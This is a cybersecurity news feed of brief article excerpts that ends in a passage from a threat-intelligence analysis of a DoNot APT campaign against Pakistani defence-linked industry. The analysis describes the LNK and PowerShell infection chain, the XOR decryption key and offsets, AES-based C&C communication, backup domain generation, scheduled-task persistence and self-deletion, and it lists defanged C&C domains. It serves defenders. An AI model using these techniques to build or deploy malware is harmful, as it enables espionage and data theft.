Threat mitigation is to MSPs what preventative medicine is to doctors. In other words, threat mitigation is the first line – and often least expensive – defense against cybercriminals.

by Barracuda

Newly unsealed documents brought by a WhatsApp lawsuit shows NSO Group''s spyware, Pegasus, was used to hack as many as ""tens of thousands” of devices. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

A popular European football club and a media giant are the latest in a growing list of organizations to abandon X. The reason? Growing concerns over hate speech and disinformation. FC St. Pauli’s recent exit from X (formerly known as Twitter) signals growing frustration with the platform’s inability—or unwillingness—to address harmful content. The German football club, known for its progressive stance on social issues, accused Elon Musk of transforming X into a breeding ground for hate and conspiracy theories. The club noted its concerns over the platform''s potential influence on Germany''s upcoming parliamentary elections set to take place in February. FC St. Pauli''s Stand Against Hate With 250,000 followers, FC St. Pauli joined X in 2013, initially using the platform to engage fans. However, Musk’s ownership, marked by a laissez-faire approach to content moderation, shifted the narrative. The club cited rising racism and unchecked conspiracy theories as key reasons for its decision to withdraw. “The space for debate has turned into an amplifier of hate,” the club stated, showcasing X’s role in shaping divisive public discourse. The account, while inactive moving forward, will remain online as a historical archive. FC St. Pauli has urged followers to migrate to BlueSky, a decentralized social media platform that promotes diversity and inclusion. The Guardian Joins the Abandon X Movement Joining the exodus, The Guardian announced its departure from X, citing similar concerns about hate speech and far-right conspiracies. With over 27 million followers across 80 accounts, the decision underscores significant discontent from media organizations. “We’ve observed disturbing content, including racism and far-right conspiracy theories, for a while,” The Guardian explained, adding that X’s coverage of the U.S. presidential election solidified its choice. Although its official accounts will go silent, individual reporters can continue using the platform under existing social media guidelines. The organization also reassured readers that articles could still be shared on X. BlueSky as an Alternative Organizations like FC St. Pauli are pointing users toward BlueSky as a safer, community-focused alternative. BlueSky operates on a decentralized model, meaning it isn’t controlled by a single entity. This approach gives users greater control over content moderation and ensures no overarching authority influences public discourse. BlueSky, which emerged from Twitter’s former CEO Jack Dorsey’s vision, uses the AT Protocol to foster interoperability and transparency. It allows users to customize their social experience, curating feeds based on their interests while minimizing exposure to hate speech and misinformation. Although still in its beta phase, BlueSky has attracted users seeking refuge from platforms like X, where harmful content has grown pervasive. Growing Criticism of Musk Musk’s self-proclaimed “free speech absolutism” has drawn sharp criticism from anti-hate groups and the European Union. Under his leadership, X reinstated controversial figures such as conspiracy theorist Alex Jones and far-right activist Tommy Robinson, sparking global outrage. Musk''s recent appointment as the head of a U.S. government efficiency effort by President-elect Donald Trump further exacerbates concerns about X’s role in political propaganda. Critics argue that the platform risks becoming a tool to amplify far-right ideologies, particularly during sensitive election periods. New revelations of election misinformation spread by a Musk-funded super PAC will only exacerbate those concerns. Industry Reactions FC St. Pauli and The Guardian are not alone in their departure. This year, several institutions, including NPR, PBS, and the Berlin Film Festival, have left X, citing the platform’s failure to curb hate speech and uphold values of inclusivity. North Wales Police also stopped using X, citing ethical misalignment, while the Royal National Orthopaedic Hospital left due to an “increased volume of hate speech.” Despite these exits, some argue the platform remains indispensable for real-time news. Socialdatabase founder Thomas Slabbers tweeted, “There’s no news without X,” highlighting its continued relevance in journalism. X CEO Linda Yaccarino dismissed concerns, claiming record-high user engagement under her leadership. “You will always have a place to engage freely and safely,” she tweeted. Musk, on the other hand, labeled The Guardian a “laboriously vile propaganda machine.” Advertisers Return Amid Controversy In a surprising twist, major corporations like IBM, Disney, and Warner Bros have resumed advertising on X after a year-long boycott. The shift reflects efforts to rebuild trust under Yaccarino’s leadership. However, it raises questions about corporate ethics in the face of rising hate speech on the platform. A Divided Digital Landscape As more organizations leave X, the platform faces an identity crisis. Is it a space for free speech, or a tool for amplifying harmful ideologies? The exits of prominent entities like FC St. Pauli and The Guardian suggest the latter, signaling a call for accountability in social media governance. BlueSky’s rising popularity signals a desire for decentralized platforms where user control takes precedence. While still developing, it offers a promising alternative to X’s increasingly polarizing ecosystem. For now, the digital landscape remains divided, reflecting a larger societal debate about free speech, responsibility, and the future of online discourse. Also read: How Cybercriminals Are Exploiting Social Media to Target You

by The Cyber Express

It was brought to our attention that a threat actor has been observed using stolen customer credentials to target organizations utilizing Snowflake databases.

by Mitiga

This month, U.S. Cyber Command launched the second iteration of the International Coordinated Cyber Security Activity (INCCA), a focused defensive cyberspace operation aimed at strengthening Department of Defense (DoD) networks and enhancing global cybersecurity partnerships.

by U.S. Cyber Command News

Not everyone actually needs to use a VPN. This simple guide will help you decide if you need a VPN for your situation. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Cybersecurity researchers have disclosed two security flaws in Google''s Vertex machine learning (ML) platform that, if successfully exploited, could allow malicious actors to escalate privileges and exfiltrate models from the cloud. ""By exploiting custom job permissions, we were able to escalate our privileges and gain unauthorized access to all data services in the project,"" Palo Alto Networks

by The Hacker News

The best security-focused browsers offer privacy features, ad blockers, private searches, and pledge never to sell your data. Here are the best options in 2024.

by ZDNET Security

In the fast-paced digital world, trust is everything—but what happens when that trust is disrupted? Certificate revocations, though rare, can send shockwaves through your operations, impacting security, customer confidence, and business continuity. Are you prepared to act swiftly when the unexpected happens? Join DigiCert’s exclusive webinar, ""When Shift Happens: Are You Ready for Rapid

by The Hacker News

Cybersecurity researchers at Varonis have identified a serious security vulnerability in PostgreSQL that could lead to data breaches…

by Hackread

A Vietnamese-speaking threat actor has been linked to an information-stealing campaign targeting government and education entities in Europe and Asia with a new Python-based malware called PXA Stealer. The malware ""targets victims'' sensitive information, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software,""

by The Hacker News

A QR code in a physical letter is a method of spreading malware that may find its way to your mailbox too.

by Malwarebytes Labs

The battle between humans and bots is heating up, with Black Friday and Cyber Monday standing as prime targets. Some “Black Friday” holiday shopping events have already begun. Based on Kasada’s 2023 findings, the trends observed last year offer valuable insights and preparation strategies for 2024. With threat actors more sophisticated than ever, retailers must...

by RH-ISAC

As VPNs go, Surfshark is well-rounded option with competitive pricing, but there are a few caveats.

by ZDNET Security

Containers are a key building block for cloud workloads, offering flexibility, scalability, and speed for deploying applications. But as organizations... The post How Runtime Insights Help with Container Security appeared first on Sysdig.

by Sysdig

In recent years, artificial intelligence (AI) has begun revolutionizing Identity Access Management (IAM), reshaping how cybersecurity is approached in this crucial field. Leveraging AI in IAM is about tapping into its analytical capabilities to monitor access patterns and identify anomalies that could signal a potential security breach. The focus has expanded beyond merely managing human

by The Hacker News

SaaS Security firm AppOmni has identified misconfigurations in Microsoft Power Pages that can lead to severe data breaches.…

by Hackread

Flexible Data Retrieval at Scale with HAQL Robert Coleman Fri, 11/15/2024 - 07:07 Body What is HAQL?Back in 2022, we were faced with a challenge: we wanted to build useful, actionable dashboards for our customers, and we wanted to build them fast. We had the data, we had the context, and we had the designs, but we were missing a way to scale the process of data wrangling for each additional data visualization. We built helper classes, DRY’d, and abstracted away code, but we still found ourselves bogged down writing opaque Arel queries that were prone to error and difficult to debug. On top of that, trying to optimize for performance while navigating a complex database authorization layer led to difficult tradeoffs between load times and security. Enter HAQL. Rather than struggle through defining each query in ActiveRecord, Arel, or risky raw SQL blocks, why not simplify the interface and focus on the specific needs of a fast analytics query engine? At its core, HAQL is just that: a simplified query interface for writing performant aggregate queries on tables modeled purposefully for data analysis. On the backend, HAQL consists of a Ruby class that constructs Arel nodes from a given input, enabling fine-grained control over the available schema, authorization, database functions, data types, output formats, database connections, row limits, error handling, and more. The query inputs themselves are highly structured and strictly typed, which makes it easier to validate malicious payloads and enforce access controls. And most importantly for our original use case, the structured inputs and outputs grant us the ability to rapidly build new dashboards. We leveraged this HAQL response contract to write reusable React components on the frontend for all our most common data visualizations; now a chart becomes a configuration, and creating a new dashboard becomes a low-code activity. So how does it work?  A preview of platform features enabled by HAQL The Anatomy of a HAQL QueryA HAQL query has many of the familiar components of a SQL query: a required select statement along with optional where predicates, join statements, order by specifications, and limit directives. Queries are typically executed via GraphQL, but can also be defined explicitly as JSON. Let’s look at an example. With this query, we’re retrieving the sum of bounties grouped by asset in the select statement. We join the assets table to the bounties table in the join statement, and specify the join conditions via a series of predicates. Finally, we order the results by the summed bounty amount.Behind the scenes in our Rails backend, each query component is parsed, validated, and incorporated as a node in an Arel query. At this point, we also apply authorization predicates and other safeguards against improper access. Results are then returned in a key-value format that’s compatible with GraphQL. In PostgreSQL, the above query would translate to:Though a simple interface, HAQL allows for quite complex queries. We’ve found that in combination with reusable frontend components and well-defined patterns for grouping related queries, HAQL has brought down the time to build a new dashboard from weeks to hours in typical use cases. Investing in CatalystsIt’s often the case in the world of engineering that small improvements have reverberations greatly exceeding the initial problem in scale. Discovering these force multipliers is more art than science, but with HAQL we found out almost immediately that there were a number of applications, many of which were completely unexpected. One of the most exciting opportunities for HAQL is its relationship to Hai, HackerOne’s AI copilot. HAQL’s schema is naturally dense with information and highly structured, making it easy for Hai to learn the language via conventional Retrieval Augmented Generation (RAG) techniques and enabling Hai to fetch, analyze, and render data as an agent in real time. Without this analytics query layer, our Hai developers would’ve been required to hand-engineer data access rules and schematic context to coax generated SQL from an LLM, they would’ve needed to write parsers for validation, and they would’ve been forced to implement complex logic for handling diverse response formats. Instead, a relatively simple addition to the LLM’s system prompt unlocks a powerful new functionality: context-aware, chat-based insights across the HackerOne platform.As an added benefit, simple yet strict authorization rules give us greater confidence in Hai’s ability to safely execute HAQL queries, and support for rich metadata allows us to “steer” LLMs towards more reliable queries that wouldn’t have been possible otherwise. Limitations In the age-old tradeoff of build vs. buy vs. open source, HAQL is no exception. Are there other tools that could have potentially helped us solve this problem? Of course. Are there downsides to managing a homegrown custom query engine in a Rails app? For sure. Are there unknown risks we haven’t uncovered yet? Definitely. The verbose syntax may also feel heavy-handed for experienced SQL users at first, and for more complex operations such as subqueries, CTEs, unions, and the like, HAQL is not the best option (yet). But there’s always the right tool for the right job, and at HackerOne, HAQL is a powerful one to have in the toolbox. Looking ForwardIn the future, we expect HAQL to have uses that go far beyond powering dashboards. It already enables a handful of REST API endpoints, and in the future, it will likely be queryable directly via the API. The number of datasets available in the HAQL schema has also been growing steadily to cover a greater share of HackerOne’s product suite. Finally, the integration with Hai is sure to attract additional product and engineering investment as we discover creative new ways to surface and interact with data. We only anticipate these capabilities to grow in what is turning out to be a very exciting time for cybersecurity and technology as a whole.  Excerpt HAQL: HackerOne''s simplified query interface for writing performant aggregate queries on tables modeled purposefully for data analysis. Main Image

by HackerOne

Threat actors are exploiting Microsoft Visio files and SharePoint to launch two-step phishing attacks, according to researchers at Perception Point.

by KnowBe4

New data shows just how crippling ransomware has been on small businesses that have fallen victim to an attack and needed to pay the ransom.

by KnowBe4

In the future, the cybersecurity landscape likely will depend not only on the ability of federal workforces to protect their agencies but also on their capacity to continuously develop and sharpen those skills.

by Dark Reading

A new report from the Open Software Supply Chain Attack Reference (OSC&R) team provides a framework to reduce how much vulnerable software reaches production.

by Dark Reading

AI in SecOps: How AI is Impacting Red and Blue Team Operations HackerOne Fri, 11/15/2024 - 06:13 Body Integrating AI into SOCsThe integration of AI into security operations centers (SOCs) and its impact on the workforce are pivotal aspects of successful AI adoption and trust building. According to the survey data, AI is significantly influencing security operations and reshaping roles within those organizations. Approximately 66% of applicable respondents indicated they are using AI in their SOCs, underscoring the growth AI has experienced in this area of security. AI’s effectiveness in the SOC is further demonstrated by the ability to automate various tasks that might otherwise consume an inordinate amount of time. A whopping 82% found AI useful for improving threat detection—an expected result because AI can easily assist in the analysis of adversary tactics, techniques, and procedures (TTPs) and crafting of associated detections. Approximately 62% of organizations are using AI to automate incident prioritization and response, minimizing potential downsides and tedious, time-wasting tasks better suited to automated systems. Another excellent use of the technology, found in 56% of respondents, is supporting faster investigations with improved data correlation across multiple sources.The Security Researcher Perspective“As an engineer doing AI development for my company, AppOmni, MLSecOps and AISecOps are 100% happening. It''s pretty difficult to turn them into a production, and I do think they’re going to blow up. People should dig in and learn it because it''s going to be highly applicable to every company. In three or five years’ time, every good engineer is going to have to know how to use and implement LLM technology and other generative AI technology.”Joseph Thacker aka @rez0_Security Researcher specializing in AIAI for Red and Blue Team OperationsOur survey found that AI is making significant inroads in both red and blue team operations. Of the 30% who use AI in their red team activities, 74% are leveraging AI to simulate more sophisticated cyber-attacks in their red team training.Approximately 62% of our respondents indicated that AI is used to create more realistic attack simulations, better preparing blue teams for emerging threats. A little over 57% of respondents found that cross-training exercises using AI tools provided better skills and learning opportunities for red/blue activities. Other notable areas include a deeper understanding of threats and vulnerabilities (52%) and automated sharing of attack insights with blue teams for faster feedback (50%). We cannot overstate this: Red teams exist to make blue teams stronger. AI-positive integrations between red and blue team activities only help strengthen the organization’s overall security posture and encourage adoption of AI technologies. However, as we noted earlier, respondents are concerned with the highly complex and ethical issues of using AI in offensive security operations. Furthermore, approximately 36% of respondents indicated that red teams might have an issue keeping up with rapidly evolving AI defenses deployed by blue teams.Want to learn more about how AI is impacting cybersecurity and prepare for the future of AI in SecOps? Check out the full survey results and analysis in the report: SANS 2024 AI Survey. Excerpt View survey results and analysis of how AI in SecOps is impacting red and blue team operations. Main Image

by HackerOne

Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data […] The post Cybersecurity dominates concerns among the C-suite, small businesses and the nation appeared first on Security Intelligence.

by Security Intelligence

Hijacking domains using a ‘Sitting Ducks attack’ remains an underrecognized topic in the cybersecurity community. Few threat researchers are familiar with this attack vector, and knowledge is scarce. However, the prevalence of these attacks and the risk to organizations are significant. Infoblox researchers estimate that over 1 million registered domains could be vulnerable daily. More evidence found on Sitting Ducks Attacks During a Sitting Ducks attack, the malicious actor gains control of a domain by … More → The post Cybercriminals hijack DNS to build stealth attack networks appeared first on Help Net Security.

by Help Net Security

Cyber crooks are trying out an interesting new approach for getting information-stealing malware installed on Android users’ smartphones: a physical letter impersonating MeteoSwiss (i.e., Switzerland’s Federal Office of Meteorology and Climatology). “The letter asks the recipients to install a new severe weather app. However, there is no such federal app with the name mentioned. Rather, the QR code shown in the letter leads to the download of malware called ‘Coper’ (also known as ‘Octo2’),” the … More → The post Cyber crooks push Android malware via letter appeared first on Help Net Security.

by Help Net Security

Given increased tensions with China over tariffs, companies could see a shift in attacks, but also fewer regulations and a run at a business-friendly federal privacy law.

by Dark Reading

Posted by Alex Rebert and Max Shavrick, Security Foundations, and Kinuko Yasuda, Core Developer Attackers regularly exploit spatial memory safety vulnerabilities, which occur when code accesses a memory allocation outside of its intended bounds, to compromise systems and sensitive data. These vulnerabilities represent a major security risk to users.  Based on an analysis of in-the-wild exploits tracked by Google''s Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade: Breakdown of memory safety CVEs exploited in the wild by vulnerability class.1 Google is taking a comprehensive approach to memory safety. A key element of our strategy focuses on Safe Coding and using memory-safe languages in new code. This leads to an exponential decline in memory safety vulnerabilities and quickly improves the overall security posture of a codebase, as demonstrated by our post about Android''s journey to memory safety. However, this transition will take multiple years as we adapt our development practices and infrastructure. Ensuring the safety of our billions of users therefore requires us to go further: we''re also retrofitting secure-by-design principles to our existing C++ codebase wherever possible. To that end, we''re working towards bringing spatial memory safety into as many of our C++ codebases as possible, including Chrome and the monolithic codebase powering our services. We’ve begun by enabling hardened libc++, which adds bounds checking to standard C++ data structures, eliminating a significant class of spatial safety bugs. While C++ will not become fully memory-safe, these improvements reduce risk as discussed in more detail in our perspective on memory safety, leading to more reliable and secure software. This post explains how we''re retrofitting hardened libc++ across our codebases and  showcases the positive impact it''s already having, including preventing exploits, reducing crashes, and improving code correctness. Bounds-checked data structures: The foundation for spatial safety One of our primary strategies for improving spatial safety in C++ is to implement bounds checking for common data structures, starting with hardening the C++ standard library (in our case, LLVM’s libc++). Hardened libc++, recently added by open source contributors, introduces a set of security checks designed to catch vulnerabilities such as out-of-bounds accesses in production. For example, hardened libc++ ensures that every access to an element of a std::vector stays within its allocated bounds, preventing attempts to read or write beyond the valid memory region. Similarly, hardened libc++ checks that a std::optional isn''t empty before allowing access, preventing access to uninitialized memory. This approach mirrors what''s already standard practice in many modern programming languages like Java, Python, Go, and Rust. They all incorporate bounds checking by default, recognizing its crucial role in preventing memory errors. C++ has been a notable exception, but efforts like hardened libc++ aim to close this gap in our infrastructure. It’s also worth noting that similar hardening is available in other C++ standard libraries, such as libstdc++. Raising the security baseline across the board Building on the successful deployment of hardened libc++ in Chrome in 2022, we''ve now made it default across our server-side production systems. This improves spatial memory safety across our services, including key performance-critical components of products like Search, Gmail, Drive, YouTube, and Maps. While a very small number of components remain opted out, we''re actively working to reduce this and raise the bar for security across the board, even in applications with lower exploitation risk. The performance impact of these changes was surprisingly low, despite Google''s modern C++ codebase making heavy use of libc++. Hardening libc++ resulted in an average 0.30% performance impact across our services (yes, only a third of a percent). This is due to both the compiler''s ability to eliminate redundant checks during optimization, and the efficient design of hardened libc++. While a handful of performance-critical code paths still require targeted use of explicitly unsafe accesses, these instances are carefully reviewed for safety. Techniques like profile-guided optimizations further improved performance, but even without those advanced techniques, the overhead of bounds checking remains minimal. We actively monitor the performance impact of these checks and work to minimize any unnecessary overhead. For instance, we identified and fixed an unnecessary check, which led to a 15% reduction in overhead (reduced from 0.35% to 0.3%), and contributed the fix back to the LLVM project to share the benefits with the broader C++ community. While hardened libc++''s overhead is minimal for individual applications in most cases, deploying it at Google''s scale required a substantial commitment of computing resources. This investment underscores our dedication to enhancing the safety and security of our products. From tests to production Enabling libc++ hardening wasn''t a simple flip of a switch. Rather, it required a multi-stage rollout to avoid accidentally disrupting users or creating an outage: Testing: We first enabled hardened libc++ in our tests over a year ago. This allowed us to identify and fix hundreds of previously undetected bugs in our code and tests. Baking: We let the hardened runtime ""bake"" in our testing and pre-production environments, giving developers time to adapt and address any new issues that surfaced. We also conducted extensive performance evaluations, ensuring minimal impact to our users'' experience. Gradual Production Rollout: We then rolled out hardened libc++ to production over several months, starting with a small set of services and gradually expanding to our entire infrastructure. We closely monitored the rollout, promptly addressing any crashes or performance regressions. Quantifiable impact In just a few months since enabling hardened libc++ by default, we''ve already seen benefits. Preventing exploits: Hardened libc++ has already disrupted an internal red team exercise and would have prevented another one that happened before we enabled hardening, demonstrating its effectiveness in thwarting exploits. The safety checks have uncovered over 1,000 bugs, and would prevent 1,000 to 2,000 new bugs yearly at our current rate of C++ development. Improved reliability and correctness: The process of identifying and fixing bugs uncovered by hardened libc++ led to a 30% reduction in our baseline segmentation fault rate across production, indicating improved code reliability and quality. Beyond crashes, the checks also caught errors that would have otherwise manifested as unpredictable behavior or data corruption. Moving average of segfaults across our fleet over time, before and after enablement. Easier debugging: Hardened libc++ enabled us to identify and fix multiple bugs that had been lurking in our code for more than a decade. The checks transform many difficult-to-diagnose memory corruptions into immediate and easily debuggable errors, saving developers valuable time and effort. Bridging the gap with memory-safe languages While libc++ hardening provides immediate benefits by adding bounds checking to standard data structures, it''s only one piece of the puzzle when it comes to spatial safety. We''re expanding bounds checking to other libraries and working to migrate our code to Safe Buffers, requiring all accesses to be bounds checked. For spatial safety, both hardened data structures, including their iterators, and Safe Buffers are necessary. Beyond improving the safety of our C++, we''re also focused on making it easier to interoperate with memory-safe languages. Migrating our C++ to Safe Buffers shrinks the gap between the languages, which simplifies interoperability and potentially even an eventual automated translation. Building a safer C++ ecosystem Hardened libc++ is a practical and effective way to enhance the safety, reliability, and debuggability of C++ code with minimal overhead. Given this, we strongly encourage organizations using C++ to enable their standard library''s hardened mode universally by default. At Google, enabling hardened libc++ is only the first step in our journey towards a spatially safe C++ codebase. By expanding bounds checking, migrating to Safe Buffers, and actively collaborating with the broader C++ community, we aim to create a future where spatial safety is the norm. Acknowledgements We’d like to thank Emilia Kasper, Chandler Carruth, Duygu Isler, Matthew Riley, and Jeff Vander Stoep for their helpful feedback. We also extend our thanks to the libc++ community for developing the hardening mode that made this work possible. Based on manual analysis of CVEs from July 15, 2014 to Dec 14, 2023. Note that we could not classify 11% of CVEs.. ↩

by Google Security Blog

By David Warr, Cyber Portfolio Manager for QBE Europe Against a backdrop of a world more connected than ever before, businesses are increasingly dependent on integrating new emerging technologies. From AI-powered tools and cloud-based services and connected devices, the opportunities for rapid growth and increased efficiency are obvious. But this online interconnectivity and reliance on […] The post Interconnectivity and cyber risk: A double-edged sword appeared first on IT Security Guru.

by IT Security Guru

In the past months, our goal at Hunter has been to simplify finding target companies, segmenting them, and reaching out in a seamless email outreach process. The most recent updates to our platform closely reflect that goal.

by The Hunter Blog

Cybersecurity researchers have disclosed a high-severity security flaw in the PostgreSQL open-source database system that could allow unprivileged users to alter environment variables, and potentially lead to code execution or information disclosure. The vulnerability, tracked as CVE-2024-10979, carries a CVSS score of 8.8. Environment variables are user-defined values that can allow a program

by The Hacker News

Microsoft revealed no plans for an immediate HoloLens 2 successor, raising questions about the company’s commitment to its VR/AR technologies.

by ITPro Today

Ilya Lichtenstein, who pleaded guilty to the 2016 hack of cryptocurrency stock exchange Bitfinex, has been sentenced to five years in prison, the U.S. Department of Justice (DoJ) announced Thursday. Lichtenstein was charged for his involvement in a money laundering scheme that led to the theft of nearly 120,000 bitcoins (valued at over $10.5 billion at current prices) from the crypto exchange.

by The Hacker News

Key Takeaways Cyble Research and Intelligence Labs (CRIL) came across a campaign Linked to the known APT group DONOT, targeting the manufacturing industry that supports the country’s maritime and defense sectors. The campaign uses a malicious LNK file disguised as an RTF containing encrypted data. The file is decrypted via PowerShell to deliver a lure RTF and payload. A scheduled task is then created to ensure the malware runs every five minutes for persistence. Random domains are generated with hardcoded words and TLDs for backup C&C servers. The encryption method for C&C communication has changed compared to previous campaigns. The stager malware communicates with the C&C server using AES encryption and Base64 encoding to evade detection. The decryption key for the second-stage payload is now in the downloaded binary rather than hardcoded in the config file. The victim’s system information is collected before delivering the final payload to assess the target''s value. The stager malware uses environment variables to store critical configuration details, like C&C addresses and task information. Overview CRIL recently came across a campaign seemingly aimed at Pakistan''s manufacturing industry, which supports the country’s maritime and defense sectors. After analyzing the files involved in the campaign, it was determined that the attack was linked to the known APT group DONOT. DoNot, also known as APT-C-35, is an Advanced Persistent Threat (APT) group operating since 2016. This group has a history of targeting government and military entities, as well as foreign affairs ministries and embassies across South Asia. Figure 1 - Cyble Vision Threat Library In this recent campaign, the Threat Actor (TA) uses the .LNK file as the initial infection vector, which could arrive within a RAR archive via spam email. The .LNK file is disguised as an RTF file, leading users to believe they are opening a legitimate file. When the user clicks to execute, it triggers cmd.exe and powershell.exe to run additional malicious commands, loading the stager malware (a DLL file) and establishing persistence by creating a scheduled task to execute the DLL file through rundll32.exe. Also, it communicates with the primary C&C server by sending a unique device ID via a POST request and, in response, receives control commands from the TA to direct its next actions. These actions include self-destruction, deployment of additional malicious payloads by downloading an encrypted payload from a specified URL, and subsequent execution. To evade detection and complicate analysis, the malware employs a different encryption method instead of the single-byte XOR key used in previous campaigns. The figure below shows the infection chain. Figure 2 - Infection Chain This “.LNK” file campaign was first identified by StrikeReady Labs, who reported it on the X platform. A similar campaign was also seen in July 2024, targeting Pakistan''s Government agencies and manufacturing industries using sector-specific lures. In the previous campaign, the TA employed malicious Office files with embedded macros and Rich Text Format (RTF) files that exploit vulnerabilities to load the stager DLL onto victim machines. When comparing the previous campaigns, the initial infection vector has shifted from Microsoft Office files to .LNK files. Additionally, the stager DLL now employs an enhanced payload delivery method and improved C&C communication, incorporating encryption mechanisms at various stages. Technical Analysis The malicious “.LNK” file contains PowerShell commands, an encrypted lure RTF file, and the encrypted stager payload. Upon execution, the “.LNK” file initiates “cmd.exe,” which creates a directory in the “%temp%” path and copies “powershell.exe” to this location as ""2SqSxDA2.exe."" The newly copied PowerShell process subsequently executes the PowerShell code embedded in the LNK file. The figure below shows the partial content of the LNK file. Figure 3 – Partial contents of the LNK file PowerShell Code The PowerShell command embedded within the “.LNK” file retrieves both a lure file and a DLL from the “.LNK” itself. It identifies the “.LNK” file based on its file size and directory path, then decrypts the lure RTF file and the DLL file using a single-byte XOR operation with “0xB2.” Decryption begins at offset “0x1774” for the lure file and “0x79AF” for the DLL. These extracted files are stored in the “%temp%\7GGVXwRn” directory. Once extraction is complete, the PowerShell command deletes the PowerShell copy “2SqSxDA2.exe,” opens the lure document, and calls “rundll32.exe” to execute the DLL, invoking the export function “HgCallClient.” Figure 4 - Content of PowerShell commands Lure Document The lure document is related to Karachi Shipyard & Engineering Works (KS&EW), a prominent defense contractor and shipbuilding company in Pakistan. This suggests that the TA is targeting industries supporting the defense sector. The figure below shows the lure document. Figure 5 - Lure Document DLL file analysis Upon execution, the DLL begins extracting configuration details from an embedded JSON file. This configuration includes information such as the configuration filename, environment variable name, server domain, transit keys for secure communication, mutex, and user-agent string. The table below shows the configuration details. Filed Name Value ConfigFileName Config.json EnvVarTaskName PFTN HMAC_Security j4fhrJpSqvgE MachineMutex 5734b817-1bb8-402b-a761-da8f2e188baf ServerDomain hxxps://internalfileserver[.]online:443/ TransitKey tTRxrb0kmbQGpdci TransitSalt aWrtRHXuEBy6CwXj userAgent Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 BackupServerURL hxxps://safehydratedcloudcosmoswebglobe[.]cc/ PrimaryServerUrl hxxps://internalfileserver[.]online:443/ FirstTaskName Schedule TaskDefinition This service enables a user to configure and schedule automated tasks on this computer. It also hosts multiple Windows system-critical tasks. If this service is stopped or disabled, these tasks will not be run at their scheduled times, and any services that explicitly depend on it will fail to start. Random domain generation The BackupServerURL mentioned in the config file is generated by selecting six values from a hardcoded array of words and concatenating them to create a domain. A TLD is then selected from a separate array of TLD values. This randomly generated domain serves as a backup for Command and Control (C&C) communication. The figure below shows the list of available words used for generating random domains. Figure 6 - Random Domain Generation Persistence After extracting the configuration details, the DLL checks for the presence of a specific scheduled task named “Schedule.” If the task is not found, it creates a new task to execute the DLL via “rundll32.exe” every 5 minutes for one day, as shown in the figure below. Figure 7 - Scheduled Task After establishing persistence, the DLL sends a POST request to the primary server URL. This request includes headers such as an HMAC (Hash-based Message Authentication Code) generated from the HTTP method, contact URL, current DateTime, and an HMAC secret key, along with an ""X-Timestamp."" The request body contains the unique DeviceID and configuration filename, encrypted using a hardcoded AES transit key and salt, then base64 encoded before being sent to the C&C primary URL. This encryption method marks a relatively new approach in this campaign compared to previous ones observed. Figure 8 - C&C communication If the C&C server responds with a status code of 200, the response content contains JSON configuration data, which is decrypted using the same AES transit key and IV. The decrypted data includes the following details: DownloadURL FileDropEnvironment FileDropName ExportFunctionName TaskName Self_Destruction (boolean) Execution (boolean) Figure 9 – JSON configuration The decrypted JSON configuration data allows the TA to control key aspects of the malware''s behavior, such as downloading additional payloads, specifying file locations, and configuring execution options. This enables flexibility to adjust the attack as needed. Next Stage payload Execution If the TA intends to execute an additional payload, the encrypted payload is downloaded according to the C&C configuration. It is then decrypted using an XOR key found within the encrypted file, just after a sequence of magic bytes, and processed using the XOR round-robin method, as shown in Figure 10. This process differs from a previous campaign where the encrypted data was fetched from a URL, and the decryption key was provided directly in the C&C configuration, as shown in Figure 11. Once decryption is successful, the data is verified as a valid binary by checking for the presence of the string ""This program cannot be run in DOS mode"". The decrypted payload is then placed in the directory specified by the “FileDropEnvironment” variable. Figure 10 - Decrypting the Payload (Latest Campaign) Figure 11 - Decrypting the payload (Previous campaign) After verifying the binary, the stager malware creates a scheduled task to execute the decrypted binary using “rundll32.exe”. The task name and execution interval are specified in the configuration details provided by the TA via the C&C. Figure 12 - Scheduled task In case of a decryption failure, the stager malware updates the configuration with the backup server URL and logs the error message ""File corruption while decrypting"" It also collects detailed system information, such as disk space and installed security products, to help identify the cause of the decryption failure. This information is then sent to the TA via POST request. Figure 13 – Gathering System information In case of successful payload deployment through the scheduled task, the stager malware logs the event in the same manner as it does for a failure, with the only difference being that the result is recorded as ""Payload Deployment Successful."" This log also contains detailed system information, helping the TA identify potential targets in case of success and detect security solutions in case of failure. The TA collects and logs all relevant details, regardless of the outcome, and sends the information to the TA''s C&C via POST request. Figure 14 - Sending JSON log as a POST request The stager malware typically stores data, including the number of attempts to communicate with the C&C, the primary C&C domain name, the last connection date, the backup domain name, and details of the second-stage payload. These values are stored as encrypted entries in the environment variables, as shown in the table below. Variable Name Value Decrypted value NFC (Not Found Count) iOJDUU+oq2I1wQwfdYl98w== 2 PDN (Primary Domain Name) ehdXQoPR9RjVlJYUWq+tIkQkazp1KhA1+59IGAXaXL94XRvH8aNbs9pv3e6PLCKK hxxps://internalfileserver[.]online:443/ LCD (Last Check Date) vKXaygaagiZygkd7/K+uvQ== 11-11-2024 BDN (Backup Domain Name) ""tc6rjFyW2AVO6pu2y/c/Vg626iQ+S/FHqYIGBpIejquLjQJwMxVv/r6q44XNnInvBJPP86CLYx9qKJ0lMfryxQ=="" hxxps://floridacloudcyberhydratedfloridatech[.]online/ During our testing, the C&C server was unavailable, preventing us from receiving a response. As a result, we were unable to observe or analyze the behavior of the next-stage DLL payload, which would have been triggered by communication with the C&C server. Without this crucial interaction, we could not fully understand how the payload executes or what further actions it might take. Self-Deletion If the TA activates the self-destruction command via C&C, the stager malware removes the scheduled task and initiates self-deletion by executing the “DEL” command through “cmd.exe”. The image below illustrates the self-deletion process. Figure 15 - Self delete Threat Actor Attribution The malicious DLL connects to the C&C server ""internalfileserver[.]online,"" which resolves to the IP address ""94[.]141.120[.]137."" This same IP address previously hosted the domain ""office-updatecentral[.]com,"" which was used by the DoNot APT group in a prior campaign. Also, the tactics, techniques, and procedures (TTPs) observed in this campaign exhibit similar behavior to those reported by the 360 Threat Intelligence Centre. Conclusion This DoNot APT campaign shows an evolution in tactics. It uses malicious LNK files, PowerShell for payload delivery, and scheduled tasks for persistence. The group also employs dynamic domain generation for backup C&C servers and has updated its encryption methods to avoid detection. The shift in how decryption keys are handled and 